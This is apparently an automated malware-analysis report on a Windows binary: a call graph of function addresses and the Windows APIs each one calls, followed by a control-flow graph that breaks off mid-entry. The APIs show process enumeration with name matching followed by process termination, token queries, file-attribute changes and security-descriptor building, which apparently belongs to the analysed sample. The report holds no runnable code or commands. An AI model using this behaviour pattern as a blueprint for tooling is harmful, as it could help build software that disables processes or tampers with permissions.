7ff64b93cf7f 10802->10809 10949 7ff64b93cc72 10802->10949 10804 7ff64b93cf97 10806 7ff64b93cfbf 10804->10806 10810 7ff64b93ca90 fputwc 10804->10810 10805->10800 10805->10802 10808 7ff64b93ccd9 2 API calls 10805->10808 10806->10781 10807 7ff64b93ca90 fputwc 10807->10809 10808->10805 10809->10804 10809->10807 10810->10804 10812 7ff64b93d8b9 10811->10812 10813 7ff64b93cdd0 9 API calls 10812->10813 10814 7ff64b93d904 10813->10814 10815 7ff64b93ca90 fputwc 10814->10815 10816 7ff64b93d925 10815->10816 10818 7ff64b93e556 10817->10818 10819 7ff64b93e6b4 10818->10819 10836 7ff64b93d120 10818->10836 10881 7ff64b93f663 10818->10881 10892 7ff64b93e34c 10819->10892 10822 7ff64b93e5ee 10823 7ff64b93e6ac 10822->10823 10825 7ff64b93e6e0 10822->10825 10888 7ff64b93f717 10823->10888 10895 7ff64b93e320 10825->10895 10827 7ff64b93ee37 10829 7ff64b93f803 6 API calls 10827->10829 10831 7ff64b93ee44 10829->10831 10830 7ff64b93ed9f 10830->10827 10851 7ff64b93ee18 10830->10851 10902 7ff64b93f949 10830->10902 10838 7ff64b93f949 6 API calls 10831->10838 10847 7ff64b93ee5c 10831->10847 10832 7ff64b93f717 4 API calls 10832->10836 10834 7ff64b93f717 4 API calls 10844 7ff64b93f3c7 10834->10844 10835 7ff64b93f949 6 API calls 10835->10827 10836->10769 10836->10770 10838->10847 10840 7ff64b93eaae 10840->10832 10842 7ff64b93f3de 10845 7ff64b93f717 4 API calls 10842->10845 10844->10840 10844->10842 10849 7ff64b93f717 4 API calls 10844->10849 10845->10840 10846 7ff64b93eee9 10852 7ff64b93fa57 6 API calls 10846->10852 10857 7ff64b93ef05 10846->10857 10847->10846 10921 7ff64b93fa57 10847->10921 10848 7ff64b93f717 4 API calls 10848->10851 10849->10842 10851->10827 10851->10835 10852->10857 10853 7ff64b93ef22 10854 7ff64b93efdb 10853->10854 10855 7ff64b93ef6e 10853->10855 10856 7ff64b93efe6 10854->10856 10863 7ff64b93f2cd 10854->10863 10860 7ff64b93f763 6 API calls 10855->10860 10877 7ff64b93ebc1 10855->10877 10858 7ff64b93eff7 10856->10858 10861 7ff64b93fa57 6 API calls 10856->10861 10857->10853 10927 7ff64b93f763 10857->10927 10864 7ff64b93f663 6 API calls 10858->10864 10876 7ff64b93f030 10858->10876 10860->10877 10861->10858 10866 7ff64b93f321 10863->10866 10868 7ff64b93f763 6 API calls 10863->10868 10867 7ff64b93f00e 10864->10867 10865 7ff64b93f763 6 API calls 10865->10853 10870 7ff64b93fa57 6 API calls 10866->10870 10866->10877 10869 7ff64b93fa57 6 API calls 10867->10869 10868->10863 10869->10876 10870->10877 10872 7ff64b93f717 4 API calls 10872->10876 10873 7ff64b93f119 10874 7ff64b93f1b4 10873->10874 10880 7ff64b93f134 10873->10880 10875 7ff64b93fa57 6 API calls 10874->10875 10874->10877 10875->10877 10876->10866 10876->10872 10876->10873 10876->10877 10879 7ff64b93f763 6 API calls 10876->10879 10933 7ff64b93fb9a 10876->10933 10877->10834 10877->10840 10878 7ff64b93f763 6 API calls 10878->10880 10879->10876 10880->10877 10880->10878 10940 7ff64b93f560 10881->10940 10884 7ff64b93f68b 10946 7ff64b93f605 10884->10946 10885 7ff64b93f6ec malloc 10885->10884 10886 7ff64b93f706 10885->10886 10886->10822 10889 7ff64b93f724 10888->10889 10891 7ff64b93f73b 10888->10891 10890 7ff64b93f560 4 API calls 10889->10890 10890->10891 10891->10819 10893 7ff64b93e320 6 API calls 10892->10893 10894 7ff64b93e360 10893->10894 10894->10836 10896 7ff64b93e32c 10895->10896 10897 7ff64b93f663 6 API calls 10896->10897 10898 7ff64b93e340 10897->10898 10898->10830 10898->10840 10898->10877 10899 7ff64b93f803 10898->10899 10900 7ff64b93f663 6 API calls 10899->10900 10901 7ff64b93f814 10900->10901 10901->10830 10903 7ff64b93f95d 10902->10903 10904 7ff64b93f973 10902->10904 10905 7ff64b93f763 6 API calls 10903->10905 10906 7ff64b93edfd 10904->10906 10907 7ff64b93f560 4 API calls 10904->10907 10913 7ff64b93f9d6 10904->10913 10905->10904 10917 7ff64b93f829 10906->10917 10908 7ff64b93f99e 10907->10908 10909 7ff64b93f9b4 10908->10909 10910 7ff64b93f803 6 API calls 10908->10910 10909->10906 10912 7ff64b93f605 LeaveCriticalSection 10909->10912 10910->10909 10911 7ff64b93f560 4 API calls 10911->10913 10912->10913 10913->10906 10913->10911 10914 7ff64b93f717 4 API calls 10913->10914 10915 7ff64b93f829 6 API calls 10913->10915 10916 7ff64b93f605 LeaveCriticalSection 10913->10916 10914->10913 10915->10913 10916->10913 10918 7ff64b93f847 10917->10918 10919 7ff64b93f663 6 API calls 10918->10919 10920 7ff64b93ee0b 10919->10920 10920->10848 10922 7ff64b93fa80 10921->10922 10923 7ff64b93f663 6 API calls 10922->10923 10925 7ff64b93fa90 10923->10925 10924 7ff64b93fb42 10924->10846 10925->10924 10925->10925 10926 7ff64b93f717 4 API calls 10925->10926 10926->10924 10929 7ff64b93f77e 10927->10929 10928 7ff64b93ef43 10928->10853 10928->10865 10929->10928 10930 7ff64b93f663 6 API calls 10929->10930 10931 7ff64b93f7b5 10930->10931 10931->10928 10932 7ff64b93f717 4 API calls 10931->10932 10932->10928 10934 7ff64b93fbaf 10933->10934 10935 7ff64b93fbd0 10934->10935 10936 7ff64b93fbb3 10934->10936 10938 7ff64b93f663 6 API calls 10935->10938 10937 7ff64b93f663 6 API calls 10936->10937 10939 7ff64b93fbba 10937->10939 10938->10939 10939->10876 10941 7ff64b93f573 EnterCriticalSection 10940->10941 10944 7ff64b93f591 10940->10944 10941->10944 10942 7ff64b93f5a4 InitializeCriticalSection InitializeCriticalSection 10942->10944 10943 7ff64b93f5ec Sleep 10943->10944 10944->10941 10944->10942 10944->10943 10945 7ff64b93f5fe 10944->10945 10945->10884 10945->10885 10947 7ff64b93f60e LeaveCriticalSection 10946->10947 10948 7ff64b93f625 10946->10948 10947->10948 10948->10886 10950 7ff64b93cc80 localeconv 10949->10950 10952 7ff64b93ccae 10949->10952 10951 7ff64b94026c 6 API calls 10950->10951 10951->10952 11371 7ff64b93c958 11372 7ff64b93c960 localeconv 11371->11372 11378 7ff64b93c382 11371->11378 11373 7ff64b94026c 6 API calls 11372->11373 11373->11378 11374 7ff64b93ca67 11375 7ff64b93b3e7 fputc 11375->11378 11376 7ff64b93b9b0 fputc 11376->11378 11377 7ff64b93bbb4 fputc 11377->11378 11378->11374 11378->11375 11378->11376 11378->11377 9913 7ff64b93385c 9914 7ff64b933869 9913->9914 9915 7ff64b9338a9 9913->9915 9917 7ff64b931cf4 8 API calls 9914->9917 9916 7ff64b9314e2 6 API calls 9915->9916 9918 7ff64b9338ce 9916->9918 9919 7ff64b933875 9917->9919 9919->9918 9920 7ff64b931c73 8 API calls 9919->9920 9921 7ff64b933889 9920->9921 9921->9915 9921->9918 9922 7ff64b9338d8 GetLastError 9921->9922 9923 7ff64b9314e2 6 API calls 9922->9923 9923->9918 10476 7ff64b93475d 10477 7ff64b934b28 10476->10477 10478 7ff64b934b2d fclose 10477->10478 10479 7ff64b934b35 10477->10479 10478->10479 10480 7ff64b934b39 10479->10480 10481 7ff64b934ba2 10479->10481 10484 7ff64b9314e2 6 API calls 10480->10484 10482 7ff64b9314e2 6 API calls 10481->10482 10483 7ff64b934b78 10482->10483 10484->10483 11400 7ff64b93dd5c 11401 7ff64b93dd6e 11400->11401 11402 7ff64b93d3c1 fputwc 11401->11402 11403 7ff64b93db86 11402->11403 11404 7ff64b93e2e0 11403->11404 11407 7ff64b93ccd9 fputwc fwprintf 11403->11407 11408 7ff64b93dcdd strerror 11403->11408 11405 7ff64b93e301 11404->11405 11406 7ff64b93ccd9 2 API calls 11404->11406 11406->11405 11407->11403 11409 7ff64b93cfc8 strlen 11408->11409 11409->11403 11410 7ff64b931d60 11411 7ff64b931d77 11410->11411 11412 7ff64b931e23 11410->11412 11414 7ff64b931d80 OpenProcessToken 11411->11414 11415 7ff64b931e53 11411->11415 11413 7ff64b9314e2 6 API calls 11412->11413 11423 7ff64b931e21 11413->11423 11417 7ff64b931eb8 GetLastError 11414->11417 11418 7ff64b931d98 GetTokenInformation 11414->11418 11416 7ff64b9314e2 6 API calls 11415->11416 11416->11423 11419 7ff64b9314e2 6 API calls 11417->11419 11420 7ff64b931dce GetLastError 11418->11420 11436 7ff64b931fcd 11418->11436 11419->11423 11421 7ff64b931f67 LocalAlloc 11420->11421 11422 7ff64b931de0 11420->11422 11426 7ff64b931f82 GetTokenInformation 11421->11426 11435 7ff64b9320cb 11421->11435 11425 7ff64b9314e2 6 API calls 11422->11425 11427 7ff64b9314e2 6 API calls 11423->11427 11424 7ff64b932090 LocalAlloc 11428 7ff64b9320a8 GetLengthSid memcpy 11424->11428 11424->11435 11429 7ff64b931df6 11425->11429 11426->11424 11430 7ff64b931fac GetLastError 11426->11430 11431 7ff64b931ead 11427->11431 11428->11435 11432 7ff64b931e0e CloseHandle 11429->11432 11433 7ff64b931e05 LocalFree 11429->11433 11434 7ff64b9314e2 6 API calls 11430->11434 11432->11423 11432->11431 11433->11432 11434->11436 11436->11424 11436->11435 11437 7ff64b936d60 11438 7ff64b936d6f 11437->11438 11439 7ff64b936d82 11437->11439 11440 7ff64b936d74 11438->11440 11441 7ff64b936db5 11438->11441 11442 7ff64b9314e2 6 API calls 11439->11442 11443 7ff64b936d79 11440->11443 11445 7ff64b9314e2 6 API calls 11440->11445 11444 7ff64b9314e2 6 API calls 11441->11444 11442->11443 11444->11443 11445->11443 10485 7ff64b933b64 10486 7ff64b933b8a 10485->10486 10487 7ff64b933bc1 10485->10487 10488 7ff64b933bec 10486->10488 10489 7ff64b933b8f 10486->10489 10490 7ff64b9314e2 6 API calls 10487->10490 10493 7ff64b9314e2 6 API calls 10488->10493 10504 7ff64b933909 10489->10504 10492 7ff64b933bb9 10490->10492 10496 7ff64b933c3e GetLastError 10492->10496 10498 7ff64b933c6a 10492->10498 10493->10492 10495 7ff64b933ba2 SetFileAttributesA 10495->10492 10495->10496 10497 7ff64b9314e2 6 API calls 10496->10497 10497->10492 10499 7ff64b933d7d 10498->10499 10502 7ff64b933d02 10498->10502 10500 7ff64b9314e2 6 API calls 10499->10500 10501 7ff64b933d30 10500->10501 10503 7ff64b9314e2 6 API calls 10502->10503 10503->10501 10505 7ff64b933998 10504->10505 10506 7ff64b933921 10504->10506 10509 7ff64b9314e2 6 API calls 10505->10509 10507 7ff64b93392a GetFileAttributesA 10506->10507 10508 7ff64b9339d1 10506->10508 10511 7ff64b933a0a GetLastError 10507->10511 10513 7ff64b93393b 10507->10513 10510 7ff64b9314e2 6 API calls 10508->10510 10509->10513 10510->10513 10512 7ff64b9314e2 6 API calls 10511->10512 10512->10513 10514 7ff64b933b3a 10513->10514 10517 7ff64b933974 10513->10517 10515 7ff64b9314e2 6 API calls 10514->10515 10516 7ff64b933b5f 10515->10516 10516->10516 10518 7ff64b9314e2 6 API calls 10517->10518 10519 7ff64b93398a 10518->10519 10519->10492 10519->10495 9924 7ff64b933c63 9925 7ff64b933cec 9924->9925 9926 7ff64b933d7d 9925->9926 9929 7ff64b933d02 9925->9929 9927 7ff64b9314e2 6 API calls 9926->9927 9928 7ff64b933d30 9927->9928 9930 7ff64b9314e2 6 API calls 9929->9930 9930->9928 9931 7ff64b932463 9932 7ff64b932484 CloseHandle 9931->9932 9948 7ff64b9323f0 9932->9948 9933 7ff64b9326ed Process32Next 9934 7ff64b932704 GetLastError 9933->9934 9933->9948 9934->9948 9935 7ff64b932888 CloseHandle 9938 7ff64b9321e4 9935->9938 9939 7ff64b9328a3 9935->9939 9937 7ff64b9314e2 6 API calls 9937->9948 9938->9939 9940 7ff64b9321f4 9938->9940 9946 7ff64b9314e2 6 API calls 9939->9946 9943 7ff64b9314e2 6 API calls 9940->9943 9941 7ff64b9324d3 OpenProcess 9944 7ff64b9324f4 TerminateProcess 9941->9944 9945 7ff64b9325a3 GetLastError 9941->9945 9942 7ff64b9324c2 strcmp 9942->9941 9942->9948 9947 7ff64b932211 9943->9947 9944->9932 9950 7ff64b93250a GetLastError 9944->9950 9949 7ff64b9314e2 6 API calls 9945->9949 9946->9947 9948->9932 9948->9933 9948->9935 9948->9937 9948->9941 9948->9942 9949->9948 9951 7ff64b9314e2 6 API calls 9950->9951 9951->9948 11446 7ff64b93c562 11447 7ff64b93c566 11446->11447 11448 7ff64b93b9b0 fputc 11447->11448 11453 7ff64b93c382 11447->11453 11448->11453 11449 7ff64b93ca67 11450 7ff64b93b3e7 fputc 11450->11453 11451 7ff64b93b9b0 fputc 11451->11453 11452 7ff64b93bbb4 fputc 11452->11453 11453->11449 11453->11450 11453->11451 11453->11452 10520 7ff64b93a369 10521 7ff64b93a378 10520->10521 10522 7ff64b93a3a7 10520->10522 10526 7ff64b93a264 10521->10526 10523 7ff64b9314e2 6 API calls 10522->10523 10525 7ff64b93a390 10523->10525 10527 7ff64b93a2c9 10526->10527 10528 7ff64b93a286 10526->10528 10530 7ff64b9314e2 6 API calls 10527->10530 10529 7ff64b939ed0 8 API calls 10528->10529 10531 7ff64b93a299 10529->10531 10535 7ff64b93a29f 10530->10535 10532 7ff64b93a2f9 _errno _strtoui64 _errno 10531->10532 10531->10535 10533 7ff64b93a32c _errno 10532->10533 10532->10535 10534 7ff64b9314e2 6 API calls 10533->10534 10534->10535 10535->10525 9961 7ff64b934c69 9962 7ff64b934be8 9961->9962 9963 7ff64b934d5a 9962->9963 9964 7ff64b934c0a 9962->9964 9965 7ff64b9314e2 6 API calls 9963->9965 9966 7ff64b9314e2 6 API calls 9964->9966 9967 7ff64b934d7c 9965->9967 9968 7ff64b934c20 9966->9968 9967->9967 10953 7ff64b93a66c 10954 7ff64b93a67e 10953->10954 10955 7ff64b93a693 10954->10955 10957 7ff64b93aebd 10954->10957 10958 7ff64b93aed3 10957->10958 10959 7ff64b93aecb 10957->10959 10958->10955 10959->10958 10960 7ff64b93aee1 10959->10960 10962 7ff64b93aed1 10959->10962 10960->10958 10961 7ff64b93aeeb InitializeCriticalSection 10960->10961 10961->10958 10962->10958 10963 7ff64b93af29 free 10962->10963 10964 7ff64b93af37 DeleteCriticalSection 10962->10964 10963->10962 10964->10958 11454 7ff64b932d71 11455 7ff64b932f1c 11454->11455 11456 7ff64b932f27 CloseHandle 11455->11456 11457 7ff64b932f2d 11455->11457 11456->11457 11458 7ff64b932f36 11457->11458 11459 7ff64b9329db 11457->11459 11460 7ff64b9314e2 6 API calls 11458->11460 11461 7ff64b9331b6 11458->11461 11459->11461 11462 7ff64b9314e2 6 API calls 11459->11462 11463 7ff64b932a3c 11460->11463 11462->11463 10018 7ff64b93dc75 10019 7ff64b93dccd 10018->10019 10020 7ff64b93dc8a 10018->10020 10021 7ff64b93cfc8 strlen 10019->10021 10022 7ff64b93dcb4 wcslen 10020->10022 10023 7ff64b93dcad 10020->10023 10028 7ff64b93db86 10021->10028 10022->10023 10024 7ff64b93ccd9 2 API calls 10023->10024 10024->10028 10025 7ff64b93e2e0 10026 7ff64b93e301 10025->10026 10027 7ff64b93ccd9 2 API calls 10025->10027 10027->10026 10028->10025 10029 7ff64b93ccd9 fputwc fwprintf 10028->10029 10030 7ff64b93dcdd strerror 10028->10030 10029->10028 10031 7ff64b93cfc8 strlen 10030->10031 10031->10028 10041 7ff64b93a072 10042 7ff64b93a0b6 10041->10042 10043 7ff64b93a08c 10041->10043 10044 7ff64b9314e2 6 API calls 10042->10044 10047 7ff64b939f70 10043->10047 10046 7ff64b93a0a3 10044->10046 10048 7ff64b939fd7 10047->10048 10049 7ff64b939f9b 10047->10049 10050 7ff64b9314e2 6 API calls 10048->10050 10051 7ff64b939ed0 8 API calls 10049->10051 10055 7ff64b939fb4 10050->10055 10052 7ff64b939fae 10051->10052 10053 7ff64b93a007 _errno 10052->10053 10052->10055 10054 7ff64b940560 10053->10054 10056 7ff64b93a029 _errno 10054->10056 10055->10046 10056->10055 10057 7ff64b93a034 _errno 10056->10057 10058 7ff64b9314e2 6 API calls 10057->10058 10058->10055 10059 7ff64b93c436 10060 7ff64b93c44b 10059->10060 10061 7ff64b93c48e 10059->10061 10063 7ff64b93c475 wcslen 10060->10063 10064 7ff64b93c46e 10060->10064 10081 7ff64b93b593 10061->10081 10063->10064 10071 7ff64b93b420 10064->10071 10066 7ff64b93ca67 10067 7ff64b93b3e7 fputc 10068 7ff64b93c382 10067->10068 10068->10066 10068->10067 10069 7ff64b93b9b0 fputc 10068->10069 10070 7ff64b93bbb4 fputc 10068->10070 10069->10068 10070->10068 10085 7ff64b940047 10071->10085 10073 7ff64b93b44f 10075 7ff64b93b3e7 fputc 10073->10075 10079 7ff64b93b462 10073->10079 10074 7ff64b93b4d1 10077 7ff64b93b4ed 10074->10077 10078 7ff64b93b3e7 fputc 10074->10078 10075->10073 10076 7ff64b940047 4 API calls 10076->10079 10077->10068 10078->10074 10079->10074 10079->10076 10080 7ff64b93b3e7 fputc 10079->10080 10080->10079 10082 7ff64b93b5a3 10081->10082 10083 7ff64b93b5c1 strlen 10082->10083 10084 7ff64b93b5ba 10082->10084 10083->10084 10086 7ff64b940058 ___mb_cur_max_func ___lc_codepage_func 10085->10086 10087 7ff64b940053 10085->10087 10090 7ff64b93ffd0 10086->10090 10087->10086 10091 7ff64b93fff4 WideCharToMultiByte 10090->10091 10092 7ff64b93ffe4 10090->10092 10091->10092 10093 7ff64b940034 _errno 10091->10093 10092->10093 10094 7ff64b93ffeb 10092->10094 10093->10094 10094->10073 10101 7ff64b935c44 10102 7ff64b935c60 10101->10102 10103 7ff64b935cdf 10101->10103 10104 7ff64b935c79 CreateFileA 10102->10104 10106 7ff64b935d24 10102->10106 10105 7ff64b9314e2 6 API calls 10103->10105 10107 7ff64b935ccc GetLastError 10104->10107 10108 7ff64b935cb2 GetFileTime 10104->10108 10109 7ff64b935d1a 10105->10109 10111 7ff64b9314e2 6 API calls 10106->10111 10110 7ff64b935cd9 10107->10110 10113 7ff64b935d57 10107->10113 10108->10107 10108->10113 10110->10103 10110->10113 10111->10109 10112 7ff64b935deb CloseHandle 10112->10109 10113->10109 10113->10112 10114 7ff64b93e045 10119 7ff64b93db86 10114->10119 10115 7ff64b93e2e0 10116 7ff64b93e301 10115->10116 10117 7ff64b93ccd9 2 API calls 10115->10117 10117->10116 10118 7ff64b93ccd9 fputwc fwprintf 10118->10119 10119->10115 10119->10118 10120 7ff64b93dcdd strerror 10119->10120 10121 7ff64b93cfc8 strlen 10120->10121 10121->10119 10985 7ff64b93ae48 10986 7ff64b93ae5a EnterCriticalSection 10985->10986 10987 7ff64b93aeb4 10985->10987 10989 7ff64b93ae73 10986->10989 10988 7ff64b93aeab LeaveCriticalSection 10988->10987 10989->10988 10990 7ff64b93ae98 free 10989->10990 10990->10988 10991 7ff64b93a650 10992 7ff64b93a659 10991->10992 10993 7ff64b93a662 10992->10993 10994 7ff64b93aebd 3 API calls 10992->10994 10994->10993 11476 7ff64b93354e 11477 7ff64b9334db 11476->11477 11478 7ff64b9337ac 11477->11478 11479 7ff64b9314e2 6 API calls 11477->11479 11480 7ff64b933505 11479->11480 11481 7ff64b93fd98 11482 7ff64b93f663 6 API calls 11481->11482 11483 7ff64b93fdb4 11482->11483 10126 7ff64b937096 10127 7ff64b9370b2 strlen 10126->10127 10128 7ff64b9370c7 10126->10128 10127->10128 10129 7ff64b93ac96 10130 7ff64b93ad13 signal 10129->10130 10132 7ff64b93aca1 10129->10132 10131 7ff64b93ad25 signal 10130->10131 10130->10132 10131->10132 10133 7ff64b93749c 10134 7ff64b9374fd 10133->10134 10135 7ff64b9374bd 10133->10135 10138 7ff64b9314e2 6 API calls 10134->10138 10136 7ff64b937536 10135->10136 10137 7ff64b9374c2 10135->10137 10141 7ff64b9314e2 6 API calls 10136->10141 10139 7ff64b9374d6 strlen strlen 10137->10139 10140 7ff64b93756f 10137->10140 10143 7ff64b937526 10138->10143 10139->10143 10142 7ff64b9314e2 6 API calls 10140->10142 10141->10143 10142->10143 11501 7ff64b93a5a1 inet_addr 10144 7ff64b93c49e 10145 7ff64b93c4a7 10144->10145 10146 7ff64b93b593 strlen 10145->10146 10149 7ff64b93c382 10146->10149 10147 7ff64b93ca67 10148 7ff64b93b3e7 fputc 10148->10149 10149->10147 10149->10148 10150 7ff64b93b9b0 fputc 10149->10150 10151 7ff64b93bbb4 fputc 10149->10151 10150->10149 10151->10149 11502 7ff64b93c59e 11503 7ff64b93c5b4 11502->11503 11510 7ff64b93c130 11503->11510 11505 7ff64b93ca67 11506 7ff64b93b3e7 fputc 11507 7ff64b93c382 11506->11507 11507->11505 11507->11506 11508 7ff64b93b9b0 fputc 11507->11508 11509 7ff64b93bbb4 fputc 11507->11509 11508->11507 11509->11507 11511 7ff64b93c141 11510->11511 11512 7ff64b93b2d0 6 API calls 11511->11512 11513 7ff64b93c171 11512->11513 11514 7ff64b93c186 11513->11514 11515 7ff64b93c193 11513->11515 11516 7ff64b93b5da fputc 11514->11516 11517 7ff64b93c08a 11 API calls 11515->11517 11518 7ff64b93c191 11516->11518 11517->11518 11518->11507 10567 7ff64b9403ab ___mb_cur_max_func ___lc_codepage_func 10568 7ff64b9403da 10567->10568 10569 7ff64b940150 4 API calls 10568->10569 10570 7ff64b9403f9 10569->10570 10995 7ff64b9406b1 GetLastError 11528 7ff64b93ddaf 11529 7ff64b93ddb3 11528->11529 11530 7ff64b93d1bd fputwc 11529->11530 11535 7ff64b93db86 11529->11535 11530->11535 11531 7ff64b93e2e0 11532 7ff64b93e301 11531->11532 11533 7ff64b93ccd9 2 API calls 11531->11533 11533->11532 11534 7ff64b93ccd9 fputwc fwprintf 11534->11535 11535->11531 11535->11534 11536 7ff64b93dcdd strerror 11535->11536 11537 7ff64b93cfc8 strlen 11536->11537 11537->11535 11538 7ff64b93e1b5 11539 7ff64b93e1bd localeconv 11538->11539 11541 7ff64b93db86 11538->11541 11540 7ff64b94026c 6 API calls 11539->11540 11540->11541 11542 7ff64b93ccd9 fputwc fwprintf 11541->11542 11543 7ff64b93dcdd strerror 11541->11543 11544 7ff64b93e2e0 11541->11544 11542->11541 11545 7ff64b93cfc8 strlen 11543->11545 11546 7ff64b93e301 11544->11546 11547 7ff64b93ccd9 2 API calls 11544->11547 11545->11541 11547->11546 10591 7ff64b936776 10592 7ff64b93678c 10591->10592 10593 7ff64b9367fb 10591->10593 10595 7ff64b93682e 10592->10595 10596 7ff64b936795 10592->10596 10594 7ff64b9314e2 6 API calls 10593->10594 10614 7ff64b936824 10594->10614 10597 7ff64b9314e2 6 API calls 10595->10597 10598 7ff64b93685e 10596->10598 10599 7ff64b93679e 10596->10599 10597->10614 10600 7ff64b9314e2 6 API calls 10598->10600 10601 7ff64b9367aa ExpandEnvironmentStringsA 10599->10601 10602 7ff64b93688e 10599->10602 10600->10614 10603 7ff64b936909 GetLastError 10601->10603 10604 7ff64b9367bb 10601->10604 10606 7ff64b9314e2 6 API calls 10602->10606 10610 7ff64b9314e2 6 API calls 10603->10610 10607 7ff64b9367c9 10604->10607 10608 7ff64b9369dc 10604->10608 10605 7ff64b936a51 10606->10614 10611 7ff64b9314e2 6 API calls 10607->10611 10612 7ff64b9314e2 6 API calls 10608->10612 10609 7ff64b9314e2 6 API calls 10613 7ff64b9367f1 10609->10613 10610->10614 10611->10613 10612->10614 10614->10605 10614->10609 10624 7ff64b940781 BuildTrusteeWithSidW 11572 7ff64b939181 11583 7ff64b938e2e 11572->11583 11573 7ff64b9390f2 GetProcessHeap HeapFree 11573->11583 11574 7ff64b938da0 11575 7ff64b938da9 FreeLibrary 11574->11575 11576 7ff64b939284 11574->11576 11575->11576 11577 7ff64b93a1f1 11 API calls 11577->11583 11578 7ff64b938ecc strlen 11578->11583 11579 7ff64b938f64 GetProcessHeap HeapAlloc 11579->11583 11580 7ff64b938fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 11580->11583 11581 7ff64b93795a 14 API calls 11581->11583 11582 7ff64b9314e2 6 API calls 11582->11583 11583->11573 11583->11574 11583->11577 11583->11578 11583->11579 11583->11580 11583->11581 11583->11582 11584 7ff64b9391dc LocalFree 11583->11584 11584->11583 11017 7ff64b940689 GetProcessHeap 10185 7ff64b940088 ___lc_codepage_func ___mb_cur_max_func 10186 7ff64b9400b7 10185->10186 10190 7ff64b9400f1 10185->10190 10187 7ff64b9400c3 10186->10187 10191 7ff64b9400bc 10186->10191 10189 7ff64b93ffd0 2 API calls 10187->10189 10187->10190 10188 7ff64b93ffd0 2 API calls 10188->10191 10189->10187 10191->10188 10191->10190 11026 7ff64b93de8a 11029 7ff64b93dea6 11026->11029 11027 7ff64b93cc00 10 API calls 11035 7ff64b93db86 11027->11035 11028 7ff64b93df1c 11028->11027 11029->11028 11030 7ff64b93df21 11029->11030 11039 7ff64b93d5bc 11030->11039 11032 7ff64b93e2e0 11033 7ff64b93e301 11032->11033 11034 7ff64b93ccd9 2 API calls 11032->11034 11034->11033 11035->11032 11036 7ff64b93ccd9 fputwc fwprintf 11035->11036 11037 7ff64b93dcdd strerror 11035->11037 11036->11035 11038 7ff64b93cfc8 strlen 11037->11038 11038->11035 11046 7ff64b93d5d3 11039->11046 11040 7ff64b93d76b 11041 7ff64b93d7aa 11040->11041 11042 7ff64b93ca90 fputwc 11040->11042 11043 7ff64b93ca90 fputwc 11041->11043 11042->11041 11044 7ff64b93d7b7 11043->11044 11045 7ff64b93ca90 fputwc 11044->11045 11049 7ff64b93d7c8 11045->11049 11046->11040 11047 7ff64b93ca90 fputwc 11046->11047 11047->11046 11048 7ff64b93d815 11053 7ff64b93d861 11048->11053 11056 7ff64b93ca90 fputwc 11048->11056 11050 7ff64b93ca90 fputwc 11049->11050 11052 7ff64b93d7ce 11049->11052 11050->11049 11051 7ff64b93cc72 7 API calls 11051->11052 11052->11048 11052->11051 11055 7ff64b93ca90 fputwc 11052->11055 11058 7ff64b93ccd9 2 API calls 11052->11058 11054 7ff64b93ca90 fputwc 11053->11054 11057 7ff64b93d875 11054->11057 11055->11052 11056->11048 11058->11052

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 85 7ff64b938cfc-7ff64b938d3f call 7ff64b939bb9 88 7ff64b93927f 85->88 89 7ff64b938d45-7ff64b938d47 85->89 91 7ff64b939284-7ff64b939299 88->91 90 7ff64b938d4d-7ff64b938d59 89->90 89->91 90->91 92 7ff64b938d5f-7ff64b938d71 call 7ff64b931cf4 90->92 95 7ff64b938d91-7ff64b938d97 92->95 96 7ff64b938d73-7ff64b938d7d call 7ff64b931c73 92->96 97 7ff64b938d9c-7ff64b938d9e 95->97 101 7ff64b938d82-7ff64b938d88 96->101 99 7ff64b938db7-7ff64b938dce call 7ff64b931c73 97->99 100 7ff64b938da0-7ff64b938da3 97->100 106 7ff64b939257 99->106 107 7ff64b938dd4-7ff64b938deb call 7ff64b931c73 99->107 100->91 102 7ff64b938da9-7ff64b938db2 FreeLibrary 100->102 101->97 104 7ff64b938d8a-7ff64b938d8f 101->104 102->91 104->100 109 7ff64b939261 106->109 107->109 111 7ff64b938df1-7ff64b938e03 call 7ff64b931c73 107->111 112 7ff64b93926b 109->112 111->112 116 7ff64b938e09-7ff64b938e20 call 7ff64b931c73 111->116 115 7ff64b939275 112->115 115->88 116->115 119 7ff64b938e26-7ff64b938e2c 116->119 120 7ff64b938e76-7ff64b938e82 119->120 120->100 121 7ff64b938e88-7ff64b938e8a 120->121 121->100 122 7ff64b938e90-7ff64b938eca call 7ff64b93a1f1 121->122 125 7ff64b938ecc-7ff64b938f29 strlen 122->125 126 7ff64b938e72 122->126 128 7ff64b938f2f-7ff64b938f5e 125->128 129 7ff64b938e2e-7ff64b938e49 call 7ff64b9314e2 125->129 126->120 133 7ff64b938e4b-7ff64b938e5e call 7ff64b9314e2 128->133 134 7ff64b938f64-7ff64b938f8d GetProcessHeap HeapAlloc 128->134 129->126 141 7ff64b938e63-7ff64b938e6b 133->141 136 7ff64b9390a4-7ff64b9390c4 call 7ff64b9314e2 134->136 137 7ff64b938f93-7ff64b938fac 134->137 136->141 143 7ff64b9390c9-7ff64b9390df call 7ff64b9314e2 137->143 144 7ff64b938fb2-7ff64b939067 BuildTrusteeWithSidW BuildSecurityDescriptorW 137->144 141->126 151 7ff64b9390e4-7ff64b9390ec 143->151 146 7ff64b9391a9-7ff64b9391da call 7ff64b93795a 144->146 147 7ff64b93906d-7ff64b939086 call 7ff64b9314e2 144->147 155 7ff64b9391dc-7ff64b9391ea LocalFree 146->155 156 7ff64b9391ef-7ff64b939200 call 7ff64b9314e2 146->156 157 7ff64b93908c 147->157 158 7ff64b93910e-7ff64b939114 147->158 151->141 154 7ff64b9390f2-7ff64b939109 GetProcessHeap HeapFree 151->154 154->141 155->151 166 7ff64b939205 156->166 162 7ff64b93919f-7ff64b9391a4 157->162 163 7ff64b939092-7ff64b93909f 157->163 159 7ff64b93911a-7ff64b939120 158->159 160 7ff64b939211-7ff64b939216 158->160 164 7ff64b939153-7ff64b939159 159->164 165 7ff64b939122-7ff64b939125 159->165 160->151 162->151 163->136 167 7ff64b939239-7ff64b93923e 164->167 168 7ff64b93915f-7ff64b939165 164->168 169 7ff64b939127-7ff64b93912a 165->169 170 7ff64b939140-7ff64b939146 165->170 166->155 167->151 171 7ff64b93916b-7ff64b939171 168->171 172 7ff64b939243-7ff64b939248 168->172 173 7ff64b93921b-7ff64b939220 169->173 174 7ff64b939130-7ff64b939133 169->174 175 7ff64b93914c-7ff64b939151 170->175 176 7ff64b93922f-7ff64b939234 170->176 177 7ff64b939177-7ff64b93917c 171->177 178 